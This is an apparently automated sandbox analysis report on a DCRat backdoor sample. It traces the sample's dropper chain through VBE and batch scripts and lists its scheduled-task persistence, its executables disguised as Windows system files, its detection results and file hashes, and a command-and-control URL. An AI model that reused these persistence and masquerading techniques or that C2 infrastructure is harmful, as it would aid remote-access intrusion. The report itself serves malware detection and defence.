            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F4F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00F4F22B
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F5866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F5866F
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F4EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F4EF05
            Source: C:\ReviewHost\brokercrt.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ReviewHost\LGlGhCGbVntC7HCLV0QyeYWp.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ReviewHost\Qtt5UtOWbMYxPmztsNxVxiRIZauHb.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ReviewHost\brokercrt.exe "C:\ReviewHost\brokercrt.exe"Jump to behavior
            Source: C:\ReviewHost\brokercrt.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F4ED5B cpuid 0_2_00F4ED5B
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00F4A63C
            Source: C:\ReviewHost\brokercrt.exeQueries volume information: C:\ReviewHost\brokercrt.exe VolumeInformationJump to behavior
            Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exeQueries volume information: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe VolumeInformationJump to behavior
            Source: C:\Users\Public\Videos\AFKwztugVSPq.exeQueries volume information: C:\Users\Public\Videos\AFKwztugVSPq.exe VolumeInformation
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F4D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00F4D5D4
            Source: C:\Users\user\Desktop\hx1hwVZIjy.exeCode function: 0_2_00F3ACF5 GetVersionExW,0_2_00F3ACF5
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000023.00000002.2214435641.0000000002531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.2214435641.0000000002527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2112725978.0000000003397000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.2214435641.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.2214490270.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2112725978.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: brokercrt.exe PID: 2464, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AFKwztugVSPq.exe PID: 2828, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AFKwztugVSPq.exe PID: 7084, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected DCRat
            Source: Yara matchFile source: 00000023.00000002.2214435641.0000000002531000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.2214435641.0000000002527000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2112725978.0000000003397000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.2214435641.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.2214490270.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2112725978.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: brokercrt.exe PID: 2464, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AFKwztugVSPq.exe PID: 2828, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AFKwztugVSPq.exe PID: 7084, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting            		Valid Accounts111
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		11
            Process Injection            		232
            Masquerading            		OS Credential Dumping1
            System Time Discovery            		Remote Services11
            Archive Collected Data            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		11
            Scripting            		1
            Scheduled Task/Job            		1
            Disable or Modify Tools            		LSASS Memory121
            Security Software Discovery            		Remote Desktop ProtocolData from Removable Media1
            Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Scheduled Task/Job            		1
            Registry Run Keys / Startup Folder            		1
            Registry Run Keys / Startup Folder            		31
            Virtualization/Sandbox Evasion            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCron1
            DLL Side-Loading            		1
            DLL Side-Loading            		11
            Process Injection            		NTDS31
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            Application Window Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Obfuscated Files or Information            		Cached Domain Credentials3
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
            Software Packing            		DCSync47
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1428549 Sample: hx1hwVZIjy.exe Startdate: 19/04/2024 Architecture: WINDOWS Score: 100 50 Snort IDS alert for network traffic 2->50 52 Found malware configuration 2->52 54 Antivirus detection for dropped file 2->54 56 12 other signatures 2->56 9 hx1hwVZIjy.exe 3 6 2->9         started        12 AFKwztugVSPq.exe 2 2->12         started        15 AFKwztugVSPq.exe 2->15         started        process3 file4 44 C:\ReviewHost\brokercrt.exe, PE32 9->44 dropped 46 C:\ReviewHost\LGlGhCGbVntC7HCLV0QyeYWp.vbe, data 9->46 dropped 17 wscript.exe 1 9->17         started        66 Multi AV Scanner detection for dropped file 12->66 signatures5 process6 signatures7 48 Windows Scripting host queries suspicious COM object (likely to drop second stage) 17->48 20 cmd.exe 1 17->20         started        process8 process9 22 brokercrt.exe 3 30 20->22         started        26 conhost.exe 20->26         started        file10 36 C:\Windows\Containers\serviced\wininit.exe, PE32 22->36 dropped 38 C:\Users\user\AFKwztugVSPq.exe, PE32 22->38 dropped 40 C:\Users\Public\Videos\AFKwztugVSPq.exe, PE32 22->40 dropped 42 10 other malicious files 22->42 dropped 58 Antivirus detection for dropped file 22->58 60 Multi AV Scanner detection for dropped file 22->60 62 Machine Learning detection for dropped file 22->62 64 4 other signatures 22->64 28 schtasks.exe 22->28         started        30 schtasks.exe 22->30         started        32 schtasks.exe 22->32         started        34 30 other processes 22->34 signatures11 process12

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            hx1hwVZIjy.exe61%VirustotalBrowse
            hx1hwVZIjy.exe74%ReversingLabsByteCode-MSIL.Trojan.Uztuby
            hx1hwVZIjy.exe100%AviraVBS/Runner.VPG
            hx1hwVZIjy.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\ReviewHost\LGlGhCGbVntC7HCLV0QyeYWp.vbe100%AviraVBS/Runner.VPG
            C:\Windows\Containers\serviced\wininit.exe100%AviraHEUR/AGEN.1323984
            C:\ReviewHost\brokercrt.exe100%AviraHEUR/AGEN.1323984
            C:\Recovery\smss.exe100%AviraHEUR/AGEN.1323984
            C:\Users\user\AppData\Local\Temp\bWPufSNCBJ.bat100%AviraBAT/Delbat.C
            C:\ReviewHost\conhost.exe100%AviraHEUR/AGEN.1323984
            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cscript.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe100%AviraHEUR/AGEN.1323984
            C:\Users\Default\WinStore.App.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe100%AviraHEUR/AGEN.1323984
            C:\ReviewHost\RuntimeBroker.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe100%AviraHEUR/AGEN.1323984
            C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe100%AviraHEUR/AGEN.1323984
            C:\Windows\Containers\serviced\wininit.exe100%Joe Sandbox ML
            C:\ReviewHost\brokercrt.exe100%Joe Sandbox ML
            C:\Recovery\smss.exe100%Joe Sandbox ML
            C:\ReviewHost\conhost.exe100%Joe Sandbox ML
            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cscript.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe100%Joe Sandbox ML
            C:\Users\Default\WinStore.App.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe100%Joe Sandbox ML
            C:\ReviewHost\RuntimeBroker.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe100%Joe Sandbox ML
            C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe79%VirustotalBrowse
            C:\Recovery\smss.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Recovery\smss.exe79%VirustotalBrowse
            C:\ReviewHost\AFKwztugVSPq.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\ReviewHost\AFKwztugVSPq.exe79%VirustotalBrowse
            C:\ReviewHost\RuntimeBroker.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\ReviewHost\RuntimeBroker.exe79%VirustotalBrowse
            C:\ReviewHost\brokercrt.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\ReviewHost\brokercrt.exe79%VirustotalBrowse
            C:\ReviewHost\conhost.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\ReviewHost\conhost.exe79%VirustotalBrowse
            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\AFKwztugVSPq.exe79%VirustotalBrowse
            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cscript.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\cscript.exe79%VirustotalBrowse
            C:\Users\Default\WinStore.App.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Users\Default\WinStore.App.exe79%VirustotalBrowse
            C:\Users\Public\AFKwztugVSPq.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Users\Public\AFKwztugVSPq.exe79%VirustotalBrowse
            C:\Users\Public\Videos\AFKwztugVSPq.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Users\Public\Videos\AFKwztugVSPq.exe79%VirustotalBrowse
            C:\Users\user\AFKwztugVSPq.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Users\user\AFKwztugVSPq.exe79%VirustotalBrowse
            C:\Windows\Containers\serviced\wininit.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Windows\Containers\serviced\wininit.exe79%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://a0945069.xsph.ru/@==gbJBzYuFDTfalse
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namebrokercrt.exe, 00000005.00000002.2112725978.00000000033BA000.00000004.00000800.00020000.00000000.sdmpfalse
                		high

                World Map of Contacted IPs

                No contacted IP infos

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1428549
                Start date and time:2024-04-19 07:36:07 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 8m 11s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:43
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:hx1hwVZIjy.exe
                renamed because original name is a hash value
                Original Sample Name:48e5ef4a0ca234c29ceecab25fe23d91.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@45/31@0/0
                EGA Information:
                • Successful, ratio: 25%
                HCA Information:
                • Successful, ratio: 63%
                • Number of executed functions: 239
                • Number of non-executed functions: 92
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, conhost.exe
                • Excluded IPs from analysis (whitelisted): 13.85.23.86, 72.21.81.240, 52.165.164.15, 20.3.187.198
                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, a0945069.xsph.ru, glb.sls.prod.dcat.dsp.trafficmanager.net
                • Execution Graph export aborted for target AFKwztugVSPq.exe, PID 2828 because it is empty
                • Execution Graph export aborted for target AFKwztugVSPq.exe, PID 7084 because it is empty
                • Execution Graph export aborted for target brokercrt.exe, PID 2464 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                07:37:04Task SchedulerRun new task: AFKwztugVSPq path: "C:\Users\Default User\Recent\AFKwztugVSPq.exe"
                07:37:04Task SchedulerRun new task: AFKwztugVSPqA path: "C:\Users\Public\Videos\AFKwztugVSPq.exe"
                07:37:04Task SchedulerRun new task: conhost path: "C:\ReviewHost\conhost.exe"
                07:37:04Task SchedulerRun new task: conhostc path: "C:\ReviewHost\conhost.exe"
                07:37:04Task SchedulerRun new task: smss path: "C:\Recovery\smss.exe"
                07:37:04Task SchedulerRun new task: smsss path: "C:\Recovery\smss.exe"
                07:37:04Task SchedulerRun new task: wininit path: "C:\Windows\Containers\serviced\wininit.exe"
                07:37:04Task SchedulerRun new task: wininitw path: "C:\Windows\Containers\serviced\wininit.exe"
                07:37:04Task SchedulerRun new task: WinStore.App path: "C:\Users\Default\WinStore.App.exe"
                07:37:04Task SchedulerRun new task: WinStore.AppW path: "C:\Users\Default\WinStore.App.exe"
                07:37:07Task SchedulerRun new task: cscript path: "C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe"
                07:37:07Task SchedulerRun new task: cscriptc path: "C:\Users\Default User\Start Menu\Programs\System Tools\cscript.exe"
                07:37:07Task SchedulerRun new task: RuntimeBroker path: "C:\ReviewHost\RuntimeBroker.exe"
                07:37:07Task SchedulerRun new task: RuntimeBrokerR path: "C:\ReviewHost\RuntimeBroker.exe"

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Program Files (x86)\Google\Update\0a769a02709f5e

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with very long lines (527), with no line terminators
                Category:dropped
                Size (bytes):527
                Entropy (8bit):5.862789133664586
                Encrypted:false
                SSDEEP:12:oAQ/hRE1KPCa93m+kB74P2DpWDnpziHEV7G5nu/qU9+UQjJK41ph3IHmapS9/:oA0hRqY3m+y7PDpUmEZG5noqM+UQjM4L
                MD5:21EAA92A13642729117F1F932317A710
                SHA1:94FF21CA37EC60D736A6005BAEBD5DF00AD44B49
                SHA-256:23C4BAE0CF80AD2E00F454EFC9DDF9C64A317E727B78279EECFBB2D41610314B
                SHA-512:FEF51FC1D1CD228AF16C9C78D777D6180D234D37BFB2DE3C8F416B7D66F95D29EED77339D29ED195F865A8EC8765B17EADF7A1E6F9DE76C1CFF040FA02A4E5D3
                Malicious:false
                Preview:owfQXukFc4pvbDVaNved7uvmk5DM1zlSoq5DlwMrryTU1bta0KDlngi4B3qcqXOnTWHuHSyajwvIaauILmVqwApHHACsGuATkqBeU8ThVmB0uaekIhQDBh1Tr9nGQGUywcitZQxNTyUJ8zWrgbkie6RCzrwUVMRPRMDS1vK1uDuNNrU2m5kygwUzKf3sdc1HgF2vvEzuRsybMDzIW4raldsf2OHW1cYRLnrHzjHiFzhy83nHqvVjubfDWW3g7d3yUgPjWrSxwJUv53g8lAqFHyguHnvcpkll6seboDu8diwlGuHc0456xyrf9fct60HMiszNZFUhPrmjC5nWfSmvpoyHB9cIlBCmajDY44DukXrGLIcE1FNoOWh34rLamL6Oo9Ic2PclO1KR7r53gYRfyYXECJeMsmIYbcbL99LmmlZXLP6MwS4O4aaQmDasvP3mtv0eQt3hMo3M8A3wNRaZs3eACLj5jd1WrxnZZb5CYWCPhNRlKnfdze3zRzcFJ77txgfLWdXvVYAV1Od

                C:\Program Files (x86)\Google\Update\AFKwztugVSPq.exe

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Recovery\69ddcba757bf72

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with very long lines (412), with no line terminators
                Category:dropped
                Size (bytes):412
                Entropy (8bit):5.8121864566032615
                Encrypted:false
                SSDEEP:6:vDq8g9p75Y1yivGP4Bin0CsT8baruv3sXibauUNzIOJ5FXvppFB/lPCI3h3K4:Ap75YsOi0Cy8bIwbauwzIm3v5Xh64
                MD5:A0E2570569B95E82F5E947DAFF659957
                SHA1:E21AF86431C3FF4ADCFF43FD3C7A0E240648771B
                SHA-256:FB60D0923148D48F19737AC5A9DAFE83C27D00CCA199C25F7EEB88EB42720ACE
                SHA-512:A6E7DDC11D3FD38160616B92021436824A8CBAB2D059291D031A050758408827AE54E080C7AADDC90E167CFC4571651D782754F33357477E45D01C150BC2ED4E
                Malicious:false
                Preview:HA7hJsa1ri1m29SWjHKASxOPJAsgPZaOyJPAhRZvkXnknE3TzwnTjhGUvsYJ94mSInxtuRzSrYa4JolEGZqcvGoRC5Oy3QwqvUbAQKjh7VmKHMKHGTCjNJgC9fryDAZbmtIyMly60JeaedKzuHsjNMcmyZAvdue76KiXEW4ffGsEoGhfV1E5SzOaRgAxkDdGoheU5xvYNMEHdX7r1eZlpjpG6HFiVH5cnmaHmNkhGqsFvH64iT5Fn1bF2XXxsNCFRmd160Fn42f90jVyLK9CLzywLUOOzxy3nmyJnE7rNRLuVbOTCilhNA3bxrqml0yGDmVOuLLGNRy4oEatG5MQLRpnsWV5YVFXdErtGAi0XeU5L9xtR7fqoh5w6rfY0Ps1LbbjWqmGXV3q6uctjmoazZt6J4xY

                C:\Recovery\smss.exe

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):848384
                Entropy (8bit):6.078520776825986
                Encrypted:false
                SSDEEP:12288:W/mbBYJB7ioiXGQCo9yzsC4cYHi+z2Cp1ZpQAKjS6HZ:wmbqJB7ioiB9yzs9/Hi+i01ZxtYZ
                MD5:96B975481850ADD8CCB0353227ECEB87
                SHA1:F201465C8E9EEF2193C0023E5593F901D0C2A7F0
                SHA-256:0032FB8BB3E91A8063A769E8504814F02222448C01B61E3990B35316525057C9
                SHA-512:27A4100A0F3B8E859436859F2ED23207CE7D4236D42881B6D79B1591816864921A00D98693A60D6C9444DBEFD95C3833BC86EC0A20953F9D3B249EA7F527B6B4
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 88%
                • Antivirus: Virustotal, Detection: 79%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\ReviewHost\088424020bedd6

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with very long lines (599), with no line terminators
                Category:dropped
                Size (bytes):599
                Entropy (8bit):5.873527358939234
                Encrypted:false
                SSDEEP:12:RMHKqVt8XzsJ5e0WpNXw247/AhaFu5fnRRZxonJVTvEdQhZT+7N/f3+7pq7nIJtB:RuVt8XAJM5Ng247kiu5PDZxUJVwKq7Nc
                MD5:01C224CA1A5F2FAF074A5D0D9B0B1D86
                SHA1:CE091E34F3E440CB3F494D89C04B2D07AFA154C2
                SHA-256:61961E3BD599BD766F7AB99568A007166156DFE4FE8AB4709098F0F73D83266D
                SHA-512:6964733B97AECC683374574B175AD8B3F8AE60D638305A913A15431BCAE8A8AEC486C466EA72054C9DFD318ACAB76BCD1B795B95AB3731B053F7078B653624A0
                Malicious:false
                Preview:qe90oKLo7OJKfednu32iZtLOWhhMpHAutHWbna1SNjkikLVYszcrSLL7SueGn990OZaXIB9TBkVzInoKMJdzoSbi5YJ26vpNktUKv7PrzJqszWypFU3dgJL672bt1HWP4HOZTdZP3vAfmtsjkewm2LrbiXN2gg0rwaxsHZWm4ojuIpUNK2JXVtXsZx05PgtX5StL59bLIKrNl7S2D9snXdWCCFSUiaWY5Mz06ISKa7OKBKGce71QyF9c5qJ0rGmryTSZHc64riNZOMA28z0ljGj0MX4P9bcTVhWs1rVBB7iQ1kNtpR21QBIrucMuhq5PF3EqzSAQeyklhT8mJLkrjkDUZo7ZfkdUBSK8gh4WQlXbbgKadklWGNqe0uRKUkv4UPkOIAGmQNb7Nl23eh559HNxmqIwPtBp0dHL55Rdd8F2wsRO1Ypxp05NBwmc1UWhLvHuer7jPbbABVB4Z341EOA9i3JJTzlJmiqBkhtJaGiNZ4MqurD8Zfc7vILkhxQZzRXcoAT1Kua7qwknrcYlwnuHFsPcVImm0IYHhtCuYLxoEfR8hi3FZonLgQW5u1gBIxHhYcG8ZoNkzGDkbR4wPgN

                C:\ReviewHost\0a769a02709f5e

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):256
                Entropy (8bit):5.786494211060478
                Encrypted:false
                SSDEEP:6:S1VAvNdRZ+zDW2OMWz7i0hD8Wn4uopSWuMseZJ3d:S1VMdRZ+zS2Kz7145WSJ3d
                MD5:51904F985926252BF504A2EFA6CAF879
                SHA1:9A1B49C5FCC19FBC60B155FE9F8EC2F2468393DF
                SHA-256:1C83F8E1F384601DC06997E91C31F0C40124CAF9EFF4F498164F8745D48D631F
                SHA-512:51D9952045E780387282D40677BC5EEE3A2517A241672106D1148427FCA4FBE2570F13C835C61AD97C75599143D4301E54887C4297F6A01DFC712BD0483B02B3
                Malicious:false
                Preview:kza1wba2wczQy48sBYEJRRBC3m4ERPIIAhWTph32b5ZuFn1kpTwOiW8SyY8KgVlgTqPQioCefLrV1Q6QuUY8d4jojDfRjsWGU3aZXkCBQStXpmbhbrZM6mDZHlqfJu4wzkB80h2KRXrKKM87l8z1TJJszBRw4h1fX7hEldr4zP4j43O4mt3L5DcqaSJyPGQufLwNo3WIQ4CDOkx6wXJKnqkUe1nSU2pt9KDsGBPtXu4AAYb0fMB16FHzlcsxPDyY

                C:\ReviewHost\9e8d7a4ca61bd9

                Download File
                Process:C:\ReviewHost\brokercrt.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):105
                Entropy (8bit):5.52944906058128
                Encrypted:false
                SSDEEP:3:oGfeLIxpXz91a2hSBgRpkoofdnCVIMdachtVwXc1:hmgpXp1aG9pkNdnC+MdaOaXc1
                MD5:1C47F637C142B43DE69DAF41E9D1750E
                SHA1:B264EF9F893CB54D51EE1BCD26DCCB95683868C6
                SHA-256:DEF8323F1A822F9EF84188475024D13FF658BBFC7B9D6F0C71D88B4D6AF8B6D1
